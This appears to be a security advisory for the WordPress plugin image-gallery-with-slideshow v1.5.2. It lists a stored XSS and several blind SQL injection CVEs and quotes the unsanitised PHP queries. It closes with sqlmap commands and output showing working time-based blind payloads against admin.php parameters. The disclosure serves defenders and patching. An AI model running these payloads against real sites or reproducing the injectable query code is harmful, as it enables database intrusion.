Title:Blind SQL Injection and persistent XSS in Wordpress plugin image-gallery-with-slideshow v1.5.2
CVE-2017-1002011:

There is a stored XSS vulnerability via the $value->gallery_name and $value->gallery_description where anyone with privileges to modify or add galleries / images and inject javascript into the database.

145  gallery_name;?>
146   gallery_description;?>

CVE-2017-1002012:

In image-gallery-with-slideshow/admin_setting.php the following snippet of code does not sanitize input via the gid variable before passing it into an SQL statement:


173 if($_REQUEST['val'] == 'view')
174 {
175         $path_value = get_combo_path_value();
176         $id = $_REQUEST['gid'];
177         global $wpdb;
178         $table_prefix = $wpdb->prefix;
179         $result = $wpdb->get_results("SELECT ig.gallery_name,ii.image_id,ii.original_name,ii.image_name,ii.gallery_id,ii.image_title,ii.link_url,ii.image_description FROM `".$table_prefix."combo_gallery` AS ig,`".$table_prefix."combo_image` AS ii WHERE ig.gallery_   id=ii.gallery_id AND ii.gallery_id =".$id);


255 if($_REQUEST['val'] == 'edit')
256 {
257         $id = $_REQUEST['gid'];
258         global $wpdb;
259         $table_prefix = $wpdb->prefix;
.
.
.
270         $edit_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_gallery` WHERE gallery_id = ".$id);

CVE-2017-1002013:
Blind SQL Injection via imgid parameter.

301 if($_REQUEST['val'] == 'imgedit')
302 {
303         $id = $_REQUEST['imgid'];
304         $gid = $_REQUEST['gid'];
305         global $wpdb;
.
.
309         if(isset($_REQUEST['edit_image_submit']))
310         {
.
.
.
318         $edit_img_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id = ".$id);


361 if($_REQUEST['gval'] == 'delete')
362 {
363         $id = $_REQUEST['gid'];
364         global $wpdb;
365         $table_prefix = $wpdb->prefix;
366         $info = $_SERVER['DOCUMENT_ROOT'];
367         $path_value = get_combo_path_value();
368         $select_img_query_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE gallery_id=".$id);


384 if($_REQUEST['ival'] == 'delete')
385 {
386         $path_value = get_combo_path_value();
387         $id = $_REQUEST['gid'];
388         global $wpdb;
389         $table_prefix = $wpdb->prefix;
390         $info = $_SERVER['DOCUMENT_ROOT'];
391         $select_img_query_result1 = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id=".$id);

CVE-2017-1002014:
Blind SQL Injection via gallery_name parameter.

422 if(isset($_POST['gallery_submit']))
423 {
424         $gallery_name = $_REQUEST['gallery_name'];
425         $insert_query_result = $wpdb->insert($table_prefix.'combo_gallery', array('gallery_name' => $gallery_name,'date' => current_time('mysql')));
426 

CVE-2017-1002015:
Blind SQL Injection via selectMulGallery parameter.
492 if(isset($_POST['image_submit']))
493 {
494         $gallery_id = $_POST['selectMulGallery'];
495         $update_gallery_query = "UPDATE `".$table_prefix."combo_image` SET gallery_id=".$gallery_id." WHERE gallery_id = '0'";
496         $wpdb->query($update_gallery_query);
$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=*' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2


Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.169:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=(CASE WHEN (2912=2912) THEN SLEEP(5) ELSE 2912 END)
---
[14:28:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:28:20] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 14:28:20


$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=*&gid=1' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=(CASE WHEN (4482=4482) THEN SLEEP(5) ELSE 4482 END)&gid=1
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[22:07:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'